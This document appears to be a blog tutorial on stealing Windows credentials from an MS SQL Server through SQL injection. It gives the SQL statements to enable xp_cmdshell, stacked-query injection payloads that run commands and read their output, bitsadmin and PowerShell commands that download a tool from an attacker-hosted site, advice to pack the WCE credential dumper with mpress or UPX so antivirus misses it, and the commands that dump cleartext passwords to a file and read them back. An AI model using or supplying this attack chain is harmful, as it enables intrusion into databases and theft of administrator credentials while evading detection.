Here are the steps to get the credentials through sqlI:
- Enable xp_cmdshell
- Download wce on to the machine
- Get the IP address
- Run wce as the administrator & output to a text file
- Read the data from the ouput file
1. Enable xp_cmdshell
xp_cmdshell allows command execution on windows based systems. It is usually not enabled by default & it has to be enabled. It can be enabled with this command:
EXEC
sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure
'xp_cmdshell', 1; RECONFIGURE;
Now we should be able to run commands through sql. The format is below:
execute
xp_cmdshell 'command'
Reading the output from xp_cmdshell is slightly tricky. This can be done in three steps:
- Create a new table (say IIP) with 1 column and insert the output of xp_cmdshell into a table
- Read the data from the table IIP using union
- Delete the table IIP
Here is an example on using xp_cmdshell to get the IP using ipconfig
- create table iip(line varchar(2000));insert into iip execute xp_cmdshell 'ipconfig'
- union select 2,line,'a',2 from iip
- drop table iip
2. Download wce on the machine
WCE (windows credential extractor) is an awesome tool which can be used to dump credentials in clear text. You will need to run as administrator to run this tool. Most AVs have blacklisted the tool.
I used a packer mpress (UPX packer should work as well) to pack this executable to avoid detection.
Check this executable for AV.
Host this exe on an internet site or some place the sql server can reach. Use the command line below to download files or powershell can be used as well.
bitsadmin /transfer mydownloadjob /download /priority normal http://yoursite destination
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile("source","dest")
3. Get the IP
Use xp_cmdshell to get the IP
execute xp_cmdshell 'ipconfig'
4. Run WCE as admin and output data to a file
Wce should be run as an admin & it was hard to read the output directly from wce through sql. So I sent the output to a file. Later read the values from the output file into a table in the database.
WCE command
C:\temp\wce_mp.exe
-w > C:\temp\output.txt
SQL command
k3';create
table iip(line varchar(2000));insert into iip
execute xp_cmdshell 'C:\temp\wce_mp.exe -w > C:\temp\output.txt';--
5. Read data from the file
The data can be read using the windows command type
type file.txt
SQL Command to read output
k3';insert
into iip execute xp_cmdshell 'type
C:\temp\output.txt';--
I have created a video for the exploit.